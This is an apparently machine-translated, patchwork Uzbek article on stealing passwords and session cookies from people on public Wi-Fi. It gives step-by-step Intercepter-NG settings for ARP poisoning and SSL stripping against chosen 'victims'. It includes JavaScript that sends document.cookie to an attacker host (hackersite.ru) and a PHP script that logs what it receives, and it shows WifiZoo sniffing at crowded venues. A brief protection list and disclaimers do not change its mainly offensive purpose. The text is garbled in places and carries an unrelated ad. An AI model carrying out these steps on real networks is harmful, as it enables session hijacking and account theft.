Ochiq Wi-Fi ulanish nuqtalarining xavf-xatarlari haqida, parollarni qanday tutish mumkinligi haqida.

Bugun biz dastur yordamida Wi-Fi orqali parollarni ushlab qolish va Wi-Fi orqali cookie-fayllarni ushlab qolishni ko'rib chiqamiz.

Hujum tufayli sodir bo'ladi hidlash.

hidlash— hidlash “Sniff” deb tarjima qilinadi. Sniffing internetdagi tarmoq faoliyatini tahlil qilish, foydalanuvchi qaysi saytlarga tashrif buyurishini ko‘rish va parollarni ushlash imkonini beradi. Ammo undan foydali maqsadlarda, Internetga har qanday ma'lumot yuboradigan viruslarni tinglash uchun ham foydalanish mumkin.

Men ko'rsatadigan usul juda oddiy va sodda. Darhaqiqat, dasturni yanada kuchliroq ishlatishingiz mumkin.
Sniff.su dasturining rasmiy veb-sayti (havoladan nusxa oling va yangi yorliqda oching), uni bo'limda yuklab olishingiz mumkin "Yuklab olish".
Windows uchun versiya mavjud Unix tizimlari va android uchun.
Biz Windows uchun ko'rib chiqamiz, chunki bu eng ko'p mashhur tizim va bu erda dastur eng ilg'or.
Sizning brauzeringiz yoki antivirusingiz dastur xavfli ekanligidan shikoyat qilishi mumkin, lekin siz o'zingiz bu xakerlik dasturi ekanligini tushunasiz va u har doim bunday buzishlarga javob beradi.
Dastur zip-arxivda yuklab olingan, siz shunchaki dasturni papkaga ochishingiz va undan foydalanishingiz kerak, hech narsa o'rnatishga hojat yo'q.
Dastur turli xil tartibga solish imkoniyatiga ega Mitm hujumlari Wi-Fi tarmog'ida.
Maqola har qanday ochiq Wi-Fi nuqtalarining xavfliligini misol qilib ko'rsatish uchun faqat ma'lumot olish uchun yozilgan belgilangan harakatlar, siz o'zingizning xavf-xataringiz va xavf-xataringiz bilan bajarasiz. Va men sizga boshqa odamlarning ma'lumotlarini himoya qilish uchun jinoiy javobgarlik haqida eslatmoqchiman.

Xizmat avi1 Instagram profilingizga obunachilarga buyurtma berish imkoniyati uchun hayratlanarli darajada arzon narxlarni taklif qiladi. Ko'p kuch va vaqt sarflamasdan, hoziroq onlayn mashhurlikka yoki sotuvga erishing.

Intercepter NG dasturi bilan ishlash

Shunday qilib, dastur Intercepter-NG.exe orqali ishga tushiriladi.
Dastur ingliz tilidagi interfeysga ega, lekin agar siz o'ziga ishongan kompyuter foydalanuvchisi bo'lsangiz, menimcha, buni tushunasiz.

Quyida sozlash bo'yicha video bo'ladi (o'qishdan ko'ra ko'rishni afzal ko'rganlar uchun).
— Tanlang kerakli tarmoq Agar ulardan bir nechtasi bo'lsa, tepada.
- Turni o'zgartiring Ethernet/WiFi, agar sizda Wi-Fi bo'lsa, siz Wi-Fi belgisini tanlashingiz kerak (tarmoq tanlovining chap tomonida)

— Tugmani bosing Skanerlash rejimi(radar belgisi)
- Bo'sh maydonda sichqonchaning o'ng tugmachasini bosing va ustiga bosing kontekst menyusi Smart skanerlash
— Tarmoqqa ulangan barcha qurilmalar paydo bo'ladi
— Jabrlanuvchini tanlang (Shift tugmachasini bosib ushlab turganda hammani tanlashingiz mumkin), shunchaki routerning o‘zini belgilamang, uning IP odatda 192.168.1.1.
- Tanlagandan so'ng, sichqonchaning o'ng tugmachasini bosing va bosing natga qo'shing

- Yorliqlarga o'ting Nat
- IN Yashirin ip Oxirgi raqamni har qanday bo'sh raqamga o'zgartirish tavsiya etiladi, bu sizning haqiqiy IP-ni yashiradi.
- Belgini qo'ying SSL Strip Va SSL Mitm.

— Bosing Sozlamalar(o'ngda viteslar).
- Belgini qo'ying Tirilish(Bu sizga shifrlangan Https protokolining parollari va cookie-fayllarini to'xtatish imkonini beradi) va O'chirish Soxta IP/Mac. Siz katakchani belgilashingiz mumkin Cookie Killer, unga rahmat, jabrlanuvchi, masalan, joriy sahifadan chiqarib yuboriladi ijtimoiy tarmoq va jabrlanuvchi parolni qayta kiritishi kerak bo'ladi va biz uni tutib olamiz. Sozlamalarni rasm bilan solishtiring.

— Mana, sozlash tugallandi, sozlamalarni tasdiq belgisi bilan yoping.
— Sozlash tugallandi, siz hujumni boshlashingiz mumkin.
— Yuqoridagi tugmani bosing Hidlashni boshlash/to'xtatish(uchburchak), xuddi shu oynada pastki qismidagi radiatsiya belgisini bosing ARP zaharini ishga tushirish/to‘xtatish
- Yorliqlarga o'ting Parol rejimi va oynani o'ng tugmasini bosing va tanlang Cookie-fayllarni ko'rsatish(“Bu qurbonlar kiritgan cookie-fayllar va parollarni ko‘rsatishga imkon beradi”)
Hammasi shu, kimdir parolni kiritishini kutamiz.
Ba'zan shunday bo'ladiki, Internet ishlashni to'xtatadi, Internetga o'zingiz kirishga harakat qiling, agar u ishlamasa, dasturni qayta ishga tushiring.
Men parolni ushlab qolish har doim ham mumkin emasligini payqadim, lekin aslida u deyarli muvaffaqiyatsiz ishlaydi.

Hammasi shu, biz Wi-Fi orqali parollarni va Wi-Fi orqali cookie-fayllarni ushlab qolishni ko'rib chiqdik.

o'zingizni asrang

Cookie-fayllar - veb-sayt tomonidan foydalanuvchining kompyuterida saqlangan matn fayli ko'rinishidagi ma'lumotlar. Autentifikatsiya ma'lumotlarini o'z ichiga oladi (login/parol, ID, telefon raqami, manzil pochta qutisi), foydalanuvchi sozlamalari, kirish holati. Brauzer profilida saqlanadi.

Cookie faylini buzish veb-resursga tashrif buyuruvchining sessiyasini o'g'irlash (yoki "o'g'irlash"). Shaxsiy ma'lumotlar nafaqat jo'natuvchi va oluvchiga, balki uchinchi shaxsga - ushlashni amalga oshirgan shaxsga ham mavjud bo'ladi.

Cookie fayllarini buzish vositalari va usullari

Kompyuter o'g'rilari, haqiqiy hayotdagi hamkasblari kabi, ko'nikma, epchillik va bilimdan tashqari, albatta, o'z vositalariga ega - asosiy kalitlar va zondlarning o'ziga xos arsenaliga ega. Keling, xakerlar Internet foydalanuvchilaridan cookie-fayllarni olish uchun foydalanadigan eng mashhur hiylalarni ko'rib chiqaylik.

Sniffers

Maxsus dasturlar kuzatish va tahlil qilish uchun tarmoq trafigi. Ularning nomi inglizcha "sniff" (sniff) fe'lidan kelib chiqqan, chunki. tugunlar o'rtasida uzatilgan paketlarni tom ma'noda "chiqib oling".

Ammo tajovuzkorlar seans ma'lumotlarini, xabarlarni va boshqalarni ushlab qolish uchun snifferdan foydalanadilar maxfiy ma'lumotlar. Ularning hujumlarining maqsadlari asosan himoyalanmagan tarmoqlar bo'lib, u erda cookie fayllari ochiq HTTP sessiyasida yuboriladi, ya'ni ular amalda shifrlanmagan. (Ommaviy Wi-Fi bu borada eng zaif hisoblanadi.)

Foydalanuvchi tuguni va veb-server o'rtasidagi Internet kanaliga snifferni joylashtirish uchun quyidagi usullar qo'llaniladi:

• Tarmoq interfeyslarini (markazlar, kalitlar) "tinglash";
• trafikni tarmoqlash va nusxalash;
• tarmoq kanali bo'shlig'iga ulanish;
• jabrlanuvchining trafigini snifferga yo'naltiruvchi maxsus hujumlar orqali tahlil qilish (MAC-spoofing, IP-spoofing).

XSS qisqartmasi ma'nosini anglatadi O'zaro sayt Skript yaratish - saytlararo skript yaratish. Foydalanuvchi ma'lumotlarini o'g'irlash uchun veb-saytlarga hujum qilish uchun foydalaniladi.

XSS printsipi quyidagicha:

• tajovuzkor veb-sayt, forum veb-sahifasiga yoki xabarga (masalan, ijtimoiy tarmoqda yozishmalarda) zararli kodni (maxsus niqoblangan skript) kiritadi;
• jabrlanuvchi zararlangan sahifaga o'tadi va o'z shaxsiy kompyuterida o'rnatilgan kodni faollashtiradi (bosadi, havolaga amal qiladi va hokazo);
• o'z navbatida, bajarilgan zararli kod foydalanuvchining maxfiy ma'lumotlarini brauzerdan (xususan, cookie-fayllardan) "chiqarib oladi" va uni tajovuzkorning veb-serveriga yuboradi.

Dasturiy ta'minotning XSS mexanizmini "implantatsiya qilish" uchun xakerlar veb-serverlar, onlayn xizmatlar va brauzerlardagi barcha zaifliklardan foydalanadilar.

Barcha XSS zaifliklari ikki turga bo'linadi:

• Passiv. Hujum veb-sahifada ma'lum bir skriptni so'rash orqali olinadi. Zararli kodni veb-sahifadagi turli shakllarga kiritish mumkin (masalan, saytning qidiruv satriga). Passiv XSSga eng sezgir bo'lganlar ma'lumotlar kelganda HTML teglarini filtrlamaydigan resurslardir;
• Faol. To'g'ridan-to'g'ri serverda joylashgan. Va ular jabrlanuvchining brauzerida faollashtirilgan. Ulardan scammers tomonidan har xil turdagi bloglar, chatlar va yangiliklar tasmalarida faol foydalaniladi.

Xakerlar o'zlarining XSS skriptlarini ehtiyotkorlik bilan "kamuflyaj" qilishadi, shunda qurbon hech narsadan shubhalanmaydi. Ular fayl kengaytmasini o'zgartiradilar, kodni tasvir sifatida o'tkazadilar, ularni havolaga rioya qilishga undaydilar va qiziqarli kontent bilan ularni jalb qiladilar. Natijada: o'z qiziqishini boshqara olmaydigan shaxsiy kompyuter foydalanuvchisi o'z qo'li bilan (sichqonchani bosish bilan) XSS skripti muallifi - kompyuter yovuzligiga seans kukilarini (login va parol bilan!) yuboradi.

Cookie almashtirish

Barcha cookie fayllari saqlanadi va veb-serverga yuboriladi (ular "kelgan") hech qanday o'zgarishsiz - asl shaklida - bir xil qiymatlar, satrlar va boshqa ma'lumotlar bilan. Ularning parametrlarini ataylab o'zgartirish cookie fayllarini almashtirish deb ataladi. Boshqacha qilib aytganda, cookie-fayllarni almashtirganda, hujumchi o'zini orzu qilgandek ko'rsatadi. Masalan, onlayn-do'konda to'lovni amalga oshirayotganda, cookie to'lov miqdorini pastga qarab o'zgartiradi - shuning uchun xaridlarda "tejamkorlik" yuzaga keladi.

Ijtimoiy tarmoqdagi boshqa birovning hisobidan o'g'irlangan seans kukilari boshqa seansga va boshqa shaxsiy kompyuterga "qo'shiladi". O'g'irlangan cookie-fayllar egasi o'z sahifasida ekan, jabrlanuvchining akkauntiga (yozuvlar, kontent, sahifa sozlamalari) to'liq kirish huquqiga ega bo'ladi.

Cookie-fayllarni “tahrirlash” quyidagilar yordamida amalga oshiriladi:

• "Cookie-fayllarni boshqarish..." funksiyasi Opera brauzeri;
• FireFox uchun cookie-fayllar menejeri va kengaytirilgan cookie menejeri qo'shimchalari;
• IECookiesView yordam dasturlari (faqat Internet Explorer);
• matn muharriri AkelPad, NotePad yoki Windows Notepad kabi.

Ma'lumotlarga jismoniy kirish

Juda oddiy sxema amalga oshirish bir necha bosqichlardan iborat. Ammo bu faqat jabrlanuvchining ochiq seansli kompyuteri, masalan, VKontakte, qarovsiz qoldirilgan taqdirdagina samarali bo'ladi (va uzoq vaqt davomida!):

1. IN manzil satri brauzerda barcha saqlangan cookie-fayllarni aks ettiruvchi javascript funksiyasi joriy qilingan.
2. "ENTER" tugmasini bosgandan so'ng ularning barchasi sahifada paydo bo'ladi.
3. Cookie-fayllar nusxalanadi, faylga saqlanadi va keyin flesh-diskga o'tkaziladi.
4. Boshqa kompyuterda cookie-fayllar yangi seansda almashtiriladi.
5. Jabrlanuvchining hisobiga kirishga ruxsat beriladi.

Qoidaga ko'ra, xakerlar yuqoridagi vositalardan (+ boshqalar) birgalikda (chunki ko'plab veb-resurslarda himoya darajasi ancha yuqori) va alohida (foydalanuvchilar haddan tashqari sodda bo'lganida) foydalanadilar.

XSS + hidlovchi

1. XSS skripti yaratiladi, u onlayn sniffer manzilini belgilaydi (uyda ishlab chiqarilgan yoki ma'lum bir xizmat).
2. Zararli kod .img (tasvir formati) kengaytmasi bilan saqlanadi.
3. Keyin bu fayl veb-sayt sahifasiga, chatga yoki shaxsiy xabarga yuklanadi - bu erda hujum amalga oshiriladi.
4. Foydalanuvchining e'tibori yaratilgan "tuzoq" ga qaratiladi (bu erda ijtimoiy muhandislik kuchga kiradi).
5. Agar tuzoq ishga tushsa, jabrlanuvchining brauzeridagi cookie-fayllar sniffer tomonidan ushlanadi.
6. Hujumchi sniffer jurnallarini ochadi va o'g'irlangan cookie fayllarini oladi.
7. Keyinchalik, yuqoridagi vositalar yordamida hisob egasining huquqlarini olish uchun almashtirishni amalga oshiradi.

Cookie-fayllarni xakerlikdan himoya qilish

1. Shifrlangan ulanishdan foydalaning (tegishli protokollar va xavfsizlik usullaridan foydalangan holda).
2. "Yangi bepul dasturiy ta'minot" bilan tanishish uchun shubhali havolalar, rasmlar yoki jozibali takliflarga javob bermang. Ayniqsa, begonalardan.
3. Faqat ishonchli veb-resurslardan foydalaning.
4. "Chiqish" tugmasini bosish orqali ruxsat berilgan seansni tugating (faqat yorliqni yopish emas!). Ayniqsa, agar siz o'z hisobingizga shaxsiy kompyuterdan emas, balki, masalan, Internet-kafedagi shaxsiy kompyuterdan kirgan bo'lsangiz.
5. Brauzerning "Parolni saqlash" funksiyasidan foydalanmang. Saqlangan ro'yxatga olish ma'lumotlari o'g'irlik xavfini sezilarli darajada oshiradi. Dangasa bo'lmang, har bir seans boshida parol va login kiritish uchun bir necha daqiqa vaqtingizni behuda sarflamang.
6. Ijtimoiy tarmoqlar, forumlar, chatlar, veb-saytlarga tashrif buyurganingizdan so'ng, saqlangan cookie-fayllarni o'chiring va brauzer keshini tozalang.
7. Doimiy ravishda brauzerlar va antivirus dasturlarini yangilang.
8. XSS hujumlaridan himoya qiluvchi brauzer kengaytmalaridan foydalaning (masalan, FF uchun NoScript va Google Chrome).
9. Vaqti-vaqti bilan hisob-kitoblarda.

Va eng muhimi, dam olish yoki Internetda ishlashda hushyorlik va e'tiborni yo'qotmang!

Cookie nima?

Http serveriga ba'zi narsalarni saqlashga imkon beruvchi mexanizm mavjud matnli ma'lumotlar, va keyin u bilan bog'laning. Ushbu ma'lumot cookie deb ataladi. Aslida, har bir cookie bir juftlikdir: parametr nomi va uning qiymati. Har bir cookie fayliga u tegishli domen ham tayinlanadi. Xavfsizlik nuqtai nazaridan, barcha brauzerlarda http serveriga faqat o'z domenining cookie-fayllariga kirishga ruxsat beriladi. Bundan tashqari, cookie-fayllar yaroqlilik muddatiga ega bo'lishi mumkin, bu holda ular barcha brauzer oynalarini yopsangiz ham, shu sanagacha kompyuterda saqlanadi.

Barcha ko'p foydalanuvchi tizimlari foydalanuvchini aniqlash uchun cookie-fayllardan foydalanadi. Aniqrog'i, foydalanuvchining xizmatga joriy ulanishi, foydalanuvchi sessiyasi. Agar kimdir cookie-fayllaringizni tanisa, u sizning nomingizdan tizimga kirishi mumkin bo'ladi. Chunki ichida hozirda juda oz sonli Internet resurslari bitta foydalanuvchi seansi davomida IP-manzil o'zgarishlarini tekshiradi.

Brauzer ishlab chiquvchilari cookie-fayllarni tahrirlash uchun o'rnatilgan vositalarni taqdim etmaydi. Ammo siz oddiy bloknot bilan o'tishingiz mumkin.

Windows ro'yxatga olish kitobi muharriri 5.00 versiyasi



@="C:\\IE_ext.htm"

Uni IE_ext.reg nomi ostida saqlang

2-qadam: Yaratilgan fayldan foydalanib, Windows ro'yxatga olish kitobiga o'zgartirishlar qo'shing.

3-qadam: matnli matnli fayl yarating

< script til = "javascript">
external.menuArguments.clipboardData.setData("Matn" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
ogohlantirish (external.menuArguments.document.cookie);

4-qadam: Bizni qiziqtirgan veb-saytga o'tamiz.

5-qadam: Sahifaning bo'sh joyini o'ng tugmasini bosing va menyu bandini tanlang "Cookie-fayllar bilan ishlash". Buferga kirishga ruxsat bering. Ushbu saytdagi cookie-fayllaringiz vaqtinchalik xotiraga o'tadi. Siz ularning bloknotini qo'yishingiz va ko'rishingiz mumkin.

6-qadam: Ba'zi cookie-fayllarni o'zgartirish uchun C:\IE_ext.htm faylini almashtiring test nomi kuki nomi bilan, sinov qiymati- uning ma'nosi haqida, testdomain.ru- sayt domeniga. Agar kerak bo'lsa, shunga o'xshash qatorlarni qo'shing. Boshqarish qulayligi uchun men skriptga o'zgartirishdan oldin va keyin joriy cookie-fayllarning chiqishini qo'shdim: ogohlantirish (external.menuArguments.document.cookie);

7-qadam: 5-bosqichni yana bajaring va keyin sahifani yangilang.

Xulosa: biz ushbu Internet-resursga yangilangan cookie-fayllar bilan kiramiz.

JavaScript yordamida cookie-fayllarni qanday o'g'irlash mumkin?

Agar tajovuzkor jabrlanuvchining kompyuterida o'zboshimchalik bilan JavaScript skriptini bajarish imkoniyatini topsa, u joriy cookie-fayllarni juda oson o'qiy oladi. Misol:

var str= document.cookie;

Ammo u ularni o'z saytiga o'tkaza oladimi, chunki yuqorida aytib o'tganimdek, JavaScript skripti boshqa domenda joylashgan saytga qo'shimcha tasdiqsiz kira olmaydi? Aniqlanishicha, JavaScript skripti istalgan http serverida joylashgan istalgan tasvirni yuklay oladi. Shu bilan birga, yuklab olish so'rovidagi har qanday matn ma'lumotlarini ushbu rasmga o'tkazing. Misol: http://hackersite.ru/xss.jpg?text_info Shunday qilib, agar siz ushbu kodni ishlatsangiz:

var img= yangi rasm();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);

"Rasm" ni yuklab olish uchun bunday so'rovlarni qanday hal qilish kerak?

Buzg'unchi faqat PHP-ni qo'llab-quvvatlaydigan hostingni topishi va u erda quyidagi kodni joylashtirishi kerak:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt", "a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Keyin ushbu skript uchun barcha so'rov parametrlari faylda saqlanadi log.txt. Oldin tasvirlangan JavaScript skriptini almashtirish qoladi http://hackersite.ru/xss.jpg ushbu PHP skriptiga boradigan yo'lga.

Men XSS zaifliklaridan foydalanishning eng oddiy usulini ko'rsatdim. Ammo bu shuni ko'rsatadiki, ko'p foydalanuvchili Internet saytida kamida bitta bunday zaiflik mavjudligi tajovuzkorga o'z resurslaridan sizning nomingizdan foydalanishga imkon berishi mumkin.

Siz allaqachon tashrif buyurgan saytga qaytganingizda, sayt sizni taniydi va oxirgi marta qo'llagan sozlamalaringiz bilan ochilishini payqadingizmi? Ha, va tez-tez? Bu login, parol, seans identifikatori va tashrifchini aniqlash uchun zarur bo'lgan boshqa o'zgaruvchilar kabi tashrif buyuruvchilar haqidagi ma'lumotlarni saqlaydigan cookie-fayllar tufayli sodir bo'ladi va resursga oxirgi tashrif davomida tanlangan foydalanuvchining afzalliklariga ko'ra sahifa tarkibini ko'rsatadi. WebCookiesSniffer dasturi foydalanuvchiga brauzerda ko'rayotgan saytlarning cookie-fayllari va ularning mazmunini ko'rsatadi.

Cookie-fayllarni ko'rish

Siz veb-sayt ochasiz va WebCookiesSniffer suratga oladi kukilar real vaqtda. Yordamchi dastur tutilgan barcha cookie-fayllarni xost, so'rov yo'li, cookie faylining umumiy uzunligi, cookie faylidagi o'zgaruvchilar soni va o'zgaruvchilar va qiymatlar nomlari bilan Cookie-ning o'zi haqidagi ma'lumotlarni saqlaydigan jadvalga qo'shadi. WebCookiesSniffer cookie-fayllar haqida to'plangan ma'lumotlarni matn faylida saqlashi mumkin. Dastur shuningdek, barcha yoki tanlangan cookie-fayllar uchun HTML hisobotini yaratish imkoniyatiga ega. Dastur ishlashi uchun WinPcap drayverini o'rnatishingiz kerak (arxivda WebCookiesSniffer bilan birga joylashgan). WebCookiesSniffer dasturining tilini rus tiliga o'zgartirish uchun WebCookiesSniffer_lng.ini faylini (shuningdek, arxivga kiritilgan) yordamchi dastur bilan katalogga ko'chiring.

WebCookiesSniffer dasturining skrinshotlari

Salom, bu qisqa maqola, aksincha qisqa Tasvir Men o'zimni bag'ishlashni xohlayman oddiy yo'l tutib olish kukilar V wi-fi tarmoqlari. Men bu erda sizga cookie fayllari nima ekanligini va nima uchun kerakligini aytmayman, agar odam "pishirilgan mahsulotlar" ni ushlab qolishdan manfaatdor bo'lsa; simsiz tarmoqda, menimcha, u nima ekanligini va nima uchun kerakligini bilishi kerak. Men faqat bir narsani aytaman: ushbu fayllardan foydalanib, foydalanuvchilardan autentifikatsiya jarayonidan o'tishni talab qiladigan turli saytlardagi boshqa odamlarning hisoblariga kirishingiz mumkin (masalan, mail.ru, vkontakte.ru va boshqalar).

Shunday qilib, keling, boshlaylik. Avval biz ni topishimiz kerak simsiz tarmoq, ochiq Internetga kirish shlyuziga ega va ushbu tarmoq juda ko'p mijozlarga ega bo'lishi maqsadga muvofiqdir. Masalan, yirik savdo markazlari, aeroportlar, turli xil qahvaxonalardagi har qanday tarmoq mos keladi, bunday joylarda odamlar odatda foydalanadilar wi-fi kirish Internetda, pochtani o'qish, turli tanishuv saytlarida hisoblarni tekshirish, LJ va turli forumlarni ko'rish uchun. Bularning barchasi bizga kerak bo'lgan narsadir. Tarmoqning joylashishini tanlashga qaror qilib, mijozlarning maksimal sonining ma'lum soatlarini o'rganib, to'g'ridan-to'g'ri jangovar operatsiyalarga o'tamiz. Buning uchun bizga noutbuk kerak wi-fi adapteri, va ma'lum dasturlar to'plami. Mening vaziyatimda men foydalanardim Acer noutbuk Aspire 3610, D-Link DWL G650 mijoz wi-fi kartasi va BackTrack3 OS o'rnatilgan.

Men sizga ushbu OS dan foydalanishni maslahat beraman, chunki u allaqachon sizga kerak bo'lishi mumkin bo'lgan barcha dasturlarni o'z ichiga oladi va eng muhim afzalligi shundaki, siz Backtrack-ni o'rnatishingiz shart emas. qattiq disk, siz ushbu OSni to'g'ridan-to'g'ri CD yoki flesh-diskdan yuklashingiz mumkin.

Endi kerakli dasturiy ta'minotga o'tamiz. Men tarmoqni topish uchun kismet-dan, cookie-fayllarni tutib olish uchun WifiZoo-dan foydalanardim. Men ikkinchi dastur haqida batafsil to'xtalib o'taman. WifiZoo passiv to'lqinli skaner bo'lib, juda ko'p narsalarni to'playdi foydali ma'lumotlar, masalan: pop3, smtp trafiki, http cookie/authinfo, msn, ftp hisob ma'lumotlari, telnet tarmog'i trafigi, nbt va boshqalar. Ushbu dasturning yagona kamchiliklari - bu kanalga o'tish rejimining yo'qligi, WifiZoo shunchaki simsiz interfeysni tinglaydi va ta'bir joiz bo'lsa, kanaldan kanalga o'tolmaydi. Ammo bu kamchilik ushbu rejimni qo'llab-quvvatlaydigan boshqa dastur - Kismet tomonidan qoplanadi. WifiZoo-ni ishga tushirish uchun sizga kerak bo'ladi:

• piton
• qo'rqinchli
• Qismet

Shunday qilib, dasturni ishga tushiramiz, avval kanalga o'tish rejimini qo'llab-quvvatlash uchun Kismet-ni ishga tushiramiz, keyin to'g'ridan-to'g'ri WifiZoo-ni ishga tushiramiz, sizning oldingizda quyidagi oyna paydo bo'lishi kerak:

Endi faqat o'tirib, biror narsani ushlab turguningizcha kutish qoladi; dastur ushlab turgan hamma narsani /logs/ dasturi bilan katalogda joylashgan jurnallarda topish mumkin. 127.0.0.1:8000 da http ga avtomatik ravishda ulanadigan GUI interfeysini ham ishga tushirishingiz mumkin.

Men ushbu ajoyib dasturning barcha xususiyatlari haqida yozmayman, o'ylaymanki, siz boshqa xususiyatlarni o'zingiz aniqlaysiz va hozirgi paytda biz faqat cookie-fayllarga qiziqamiz. Cookie-fayllar yozilgan havolani bosing va biz nima tutganimizni ko'ring: